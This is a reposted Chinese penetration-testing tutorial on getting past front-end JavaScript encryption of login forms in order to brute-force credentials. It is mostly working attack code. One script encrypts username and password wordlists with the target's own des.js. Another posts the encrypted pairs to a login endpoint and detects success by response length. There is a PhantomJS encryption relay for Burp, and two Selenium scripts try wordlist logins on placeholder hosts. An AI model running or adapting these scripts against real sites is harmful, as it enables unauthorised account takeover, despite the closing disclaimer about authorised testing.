突破前端加密方法总结

最新推荐文章于 2024-05-11 15:24:57 发布
最新推荐文章于 2024-05-11 15:24:57 发布
阅读量66 收藏
点赞数
分类专栏: 技术干货 文章标签: 前端
原文链接:https://mp.weixin.qq.com/s/_ZJJw2_cHOzf7tESfuLvxw
版权

目录

0x00 执行加密的js文件生成加密内容

0x01 burpsuite插件jsencrypt

0x02 理解js加密算法

0x03 浏览器自动化爆破

0x04 misc

0x00 执行加密的js文件生成加密内容

如 https://yyy.xxx.com/assets/des/des.js

图片

对密码(123456)进行了前端加密传输。

图片

这里还需要从页面源代码找到加密方法的参数

图片

pip install PyExecJS

再安装PhantomJS(可选),或者用默认的js解析引擎也行。(execjs.get().name)

加密脚本:生成加密后的用户名和密码

#coding:utf-8
#from selenium import webdriver
import execjs


def mzDes(s,para):
    despara = execjs.get('phantomjs').compile(s).call("strEnc",para,"csc","mz","2017")
    return despara

with open('des.js','r') as mzCrypto:

    s = mzCrypto.read()
    with open('users.txt','r') as users:   #des username
        with open('des_users.txt','w') as f4DesUser:
            user = users.readlines()
            for u in user:
                uname = u.strip()
                print uname
                desUsername = mzDes(s,uname)
                print desUsername
                f4DesUser.write(desUsername+'\n')



    with open('pwdTop54.txt','r') as pwds:   #des password
        with open('des_pwds.txt','w') as f4DesPwd:
            pwd = pwds.readlines()
            for p in pwd:
                passwd = p.strip()
                print passwd
                desPassword = mzDes(s,passwd)
                print desPassword
                f4DesPwd.write(desPassword+'\n')

图片

图片

这样就可以利用burpsuite/python脚本加载加密后的字典愉快的爆破啦。

py脚本爆破(单线程):

#coding:utf-8
#from selenium import webdriver
import execjs
import requests
import re




successCount = 0


def mzDes(s,para):
    despara = execjs.get().compile(s).call("strEnc",para,"csc","mz","2017")
    return despara

with open('des.js','r') as mzCrypto:

        s = mzCrypto.read()
        with open('users.txt','r') as users:   #des username


        user = users.readlines()
        for u in user:
            with open('top50.txt','r') as pwds:   #des password
                    uname = u.strip()
                    print uname
                    desUsername = mzDes(s,uname)
                    print desUsername

                    pwd = pwds.readlines()
                    for p in pwd:
                        passwd = p.strip()
                        print passwd
                        desPassword = mzDes(s,passwd)
                        print desPassword




                        burp0_url = "https://yyy.xxx.com:443/login"
                        burp0_cookies = {"acw_tc": "2", "session.id": "5e"}
                        burp0_headers = {"User-Agent": "Mozilla/5.0 Firefox", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://yyy.xxx.com", "Connection": "close", "Referer": "https://yyy.xxx.com/login", "Upgrade-Insecure-Requests": "1"}
                        burp0_data = {"usernumber": "test", "username": desUsername, "password": desPassword, "geetest_challenge": "caaf52fec"}

                        rsp = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

                        #print rsp.headers['content-length']
                        #if rsp.headers['content-length'] != 23862:
                        #   print 'success!!!'
                        print len(rsp.content)
                        if len(rsp.content) != 23862:
                        print 'success'
                        successCount = successCount + 1
                        pattern = re.compile(r'<p class="login-error" id="errorTips">(.*?)</p>')

                        bruteResult = pattern.search(rsp.text)
                        print bruteResult

print successCount

图片

如果遇到结合了动态因子(cookie或请求参数的某动态值)加密的,如key = substr(0,8,xsession),就要根据实际情况写爆破脚本了。

0x01 burpsuite插件jsencrypt

安装phantomjs

https://github.com/c0ny1/jsEncrypter

用法参考readme

编写对应的jsEncrypter_des.js

var webserver = require('webserver');
server = webserver.create();

var host = '127.0.0.1';
var port = '1664';

// 加载实现加密算法的js脚本
var wasSuccessful = phantom.injectJs('des.js');/*引入实现加密的js文件*/

// 处理函数
function js_encrypt(payload){
    var newpayload;
    /**********在这里编写调用加密函数进行加密的代码************/
    //var b = new Base64();
    newpayload = strEnc(payload,"key","para0","para1");
    /**********************************************************/
    return newpayload;
}

if(wasSuccessful){
    console.log("[*] load js successful");
    console.log("[!] ^_^");
    console.log("[*] jsEncrypterJS start!");
    console.log("[+] address: http://"+host+":"+port);
}else{
    console.log('[*] load js fail!');
}

var service = server.listen(host+':'+port,function(request, response){
    try{
        if(request.method == 'POST'){
            var payload = request.post['payload'];
            var encrypt_payload = js_encrypt(payload); 
            console.log('[+] ' + payload + ':' + encrypt_payload);
            response.statusCode = 200;
            response.write(encrypt_payload.toString());
            response.close();
        }else{
              response.statusCode = 200;
              response.write("^_^\n\rhello jsEncrypter!");
              response.close();
        }
    }catch(e){
        console.log('\n-----------------Error Info--------------------')
        var fullMessage = "Message: "+e.toString() + ':'+ e.line;
        for (var p in e) {
            fullMessage += "\n" + p.toUpperCase() + ": " + e[p];
        } 
        console.log(fullMessage);
        console.log('---------------------------------------------')
        console.log('[*] phantomJS exit!')
        phantom.exit();
    }   
});

图片

0x02 理解js加密算法

如md5/sha1,直接写py脚本即可,复杂一点的就要调试js了

图片

burpsuite的intruder模块自带了很多加密的选项可以直接用

图片

0x03 浏览器自动化爆破

安装selenium
安装浏览器驱动,加入环境变量。

#coding:utf-8



import time
import sys
from selenium import webdriver

reload(sys) 
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


        browser.get('http://xxx.cn/manage/login.aspx')
        browser.implicitly_wait(7)
        elem = browser.find_element_by_name("name")
        elem.send_keys(user)
        elem=browser.find_element_by_name("pws")
        elem.send_keys(pwd)

        elem=browser.find_element_by_id("submit")
        #print browser.current_window_handle
        elem.click()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                                p = pwd.strip()
                                print 'testing...' + u,p
                                BruteLogin(u,p)

    browser.quit()



if __name__ == '__main__':
    main()

图片

如果有些元素不能直接定位,就尝试用autochain,如:

#coding:utf-8
#Author:LSA
#Descript:selenium for brute
#Data:201812



import time
import sys
from selenium import webdriver
from selenium.webdriver.common import action_chains, keys
import time

reload(sys) 
sys.setdefaultencoding('utf-8')



def BruteLogin(user,pwd):


        browser.get('http://xxx.edu.cn/login.jsp')
        browser.implicitly_wait(20)

        action = action_chains.ActionChains(browser)

        elem = browser.find_element_by_name("j_username")
        elem.send_keys(user)

        action.perform()

        elem=browser.find_element_by_name("j_password")
        elem.send_keys(pwd)

        action.perform()

        elem=browser.find_element_by_name("btn_submit")
        #print browser.current_window_handle
        #elem.click()

        action.send_keys("document.getElementsByName('btn_submit')[0].click()"+keys.Keys.ENTER)
        action.perform()

        time.sleep(1)
        if '当前用户' in browser.page_source:

            print 'Login Success:' + user + '|' + pwd
            sys.exit()
        else:
            print 'LoginFaild!'


browser = webdriver.Chrome()


def main():

    with open('usernameTop500.txt','r') as fuser:
            for user in fuser.readlines():
                    u = user.strip()
                    with open('topwdglobal.txt','r') as fpwd:
                        for pwd in fpwd.readlines():
                            p = pwd.strip()
                            print 'testing...' + u,p
                            BruteLogin(u,p)

    browser.quit()



if __name__ == '__main__':
    main()

0x04 misc

  1. 中间服务器:自己搭一个服务及作为中继进行加密再发给目标服务器,较麻烦。

  2. 断点调试js修改参数

  3. fiddler替换js

可视具体情况使用。

来源: https://xz.aliyun.com/t/7190

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

运维Z叔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最常见JS加密保护代码的方法
mxd01848的博客
05-29 2338
当谈到JavaScript(简称JS)代码的保护时,加密是一种常见的策略。加密可以帮助保护你的JS代码,防止未经授权的访问、修改和复制。在本文中,我将向你介绍一些常用的保护方法,并提供一些通俗易懂的示例代码,帮助你入门。总结: 本文介绍了一些常见的JS代码加密保护方法,包括压缩和混淆、字符串加密以及使用加密算法。这些方法可以帮助你保护JS代码的安全性,防止未经授权的访问和修改。通过示例代码的演示,你可以更好地理解这些方法的实现方式。希望这篇科普文章对你入门JS代码加密保护有所帮助!
列举8种最常见的js加密方法
mxd01848的博客
09-25 3799
这些只是一些常见的JavaScript代码加密和混淆方法的示例。请注意,虽然这些方法可以增加代码的复杂性,但它们通常不能提供足够的安全性来防止有意的攻击。更重要的是,过度的代码混淆可能会导致代码难以维护和调试。在实际应用中,应根据安全需求和维护性来选择合适的加密和混淆方法。开发自定义的加密算法来混淆代码,通常需要更高级的技术和数学知识。去加密自己的代码,企业级的加密算法,不用自己折腾安全性更高。:将代码包装在自定义函数中,然后通过函数调用来执行代码。:使用工具对代码进行压缩和美化,使其难以阅读和理解。
2024年Web前端最全记一次破解前端加密详细过程(1),vue3面试题
最新发布
2301_82243603的博客
05-11 511
跳槽是每个人的职业生涯中都要经历的过程,不论你是搜索到的这篇文章还是无意中浏览到的这篇文章,希望你没有白白浪费停留在这里的时间,能给你接下来或者以后的笔试面试带来一些帮助。也许是互联网未来10年中最好的一年。但是如果你不真正的自己去尝试尝试,你永远不知道市面上的行情如何。这次找工作下来,我自身感觉市场并没有那么可怕,也拿到了几个大厂的offer。在此进行一个总结,给自己,也希望能帮助到需要的同学。
JS文件加密
w2sft的博客
06-11 2357
JS文件加密是一种将JavaScript代码转换为一种无法读取或理解的形式的技术。
js代码加密,保护js文件刻不容缓
jsjiami123的博客
07-04 766
随着互联网的高速发展,网站运行的javaSCRIPT代码常常被别人轻易的拷贝,因此程序员不得不对想办法保护自的代码---javascript加密
js常用的加密/解密方法
magua3hao的博客
09-08 2万+
谈到加密,大多数人应用场景都在于后端接口的加密签名校验。这种一般都用于服务端与服务端之间的相互调用,避免第三方使用你的接口做违法违规的事情,这种加密校验比较安全,因为没有暴露在外的代码。
取色,取密码,突破灰色按钮
03-31
5. **前端开发与调试**:开发者可能会遇到灰色按钮的问题,特别是在JavaScript或CSS中。通过开发者工具,如Chrome DevTools,可以检查和修改元素的样式和状态,从而理解和解决灰色按钮的问题。 6. **权限管理与状态...
fullstack2018osa3
05-10
JavaScript,一种最初被设计用于浏览器端的脚本语言,如今已经突破前端的限制,成为构建强大后端服务的利器。通过Node.js平台,JavaScript得以在服务器端运行,开启了全栈开发的新时代。"fullstack2018osa3"项目便...
患者信息管理系统.zip
03-05
1. 前端框架:如Spring Boot,用于构建RESTful API,与前端交互。 2. 数据库管理:可能使用MySQL或PostgreSQL存储患者信息,实现数据的高效检索和存储。 3. 模型训练:可能使用TensorFlow或PyTorch进行机器学习模型...
0044、基于网络的虚拟仪器测试系统文档资料.zip
01-26
突破了传统仪器物理形态的限制,通过用户自定义界面和强大的数据处理能力,提供更高效、灵活的测试解决方案。 二、网络技术的应用 网络技术在虚拟仪器中的角色至关重要,它使得测试系统能够跨越地理限制,实现...
js常见的加密方式
ckzuishuai的博客
03-07 6824
加密
JavaScript代码混淆加密 JS不可逆加密 JavaScript在线加密 免费JS代码加密工具
u011465309的博客
06-22 3981
前言:众所周知,JavaScript大都是运行在浏览器端,这就导致任何人都可以直接对网站的代码进行查看,如果代码没有进行任何处理就会导致直接暴露源码,他人便可轻而易举的复制你的劳动成果,所以给大家介绍一下新出的代码混淆加密工具 safekodo。 网址为www.safekodo 如上述图片所示,safekodo提供的加密有:JavaScript代码加密、动态加密、多文件加密、API方式加密 等几种方案。JavaScript代码加密为最常用的加密方式 ,可以在此处加密适用于网页端或者NODEJS的js代码,配
关于前端js解密和利用的姿势
lightsec
01-19 755
本篇主要讲的是,关于前端js逆向解密并利用的技巧
如何保护前端JS代码?前端js代码加密
热门推荐
weixin_42884230的博客
08-05 3万+
Web前端JS代码需要保护吗? 这得具体情况具体分析。 1、如果只是写一段web页面图片轮播,或是跑马灯效果等等之类简单的功能。那不需要保护。 2、如果是精心设计一个绚丽的特效,如果想要保护这段自己付诸幸苦实现的特效代码不被他人随意拿去使用,那应该保护这段JS代码! 3、如果页面上有重要的功能是用JS代码管控的,比如交易逻辑、帐号密码信息、个人隐私、甚至有与远程服务器或数据库的通信等等,那...
Javascript常规的加密方式(3种)
weixin_56115652的博客
05-18 1805
这种编码方式广泛应用于将二进制数据转换为文本数据的场合,例如在电子邮件中传输二进制数据。MD5是一种广泛使用的消息摘要算法,用于验证数据完整性和防止数据被篡改。MD5生成的摘要信息是一个128位的二进制数据,通常表示为32个十六进制数字。函数则可以将字符串转换为可传输的URI格式。最后,我们将处理后的字符串返回作为结果。函数来加密输入字符串,然后将结果转换为字符串并返回。函数来解密字符串,然后将结果转换为UTF-8格式的字符串并返回。函数进行摘要计算,然后将结果转换为十六进制格式的字符串返回。
在线加密JS代码的方法
jsjiami123的博客
07-06 881
下面为大家演示一下在线JS加密解密的方法,此方法仅供参考,如有其他方法和工具可以一起研究分享哦。
Js逆向教程-09常见的加密方式
编辑编辑器
11-19 2590
最后的最后由本人水平所限,难免有错误以及不足之处, 屏幕前的靓仔靓女们 如有发现,恳请指出!你轻轻地点了个赞,那将在我的心里世界增添一颗明亮而耀眼的星!
写一个前端接口加密方法
06-10
以下是一个简单的前端接口加密方法: 1. 将接口参数按照字典序排序,并用“参数名=参数值”的形式拼接成一个字符串,例如: ``` var params = { name: '张三', age: 18, gender: 'male' }; var paramString = '...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值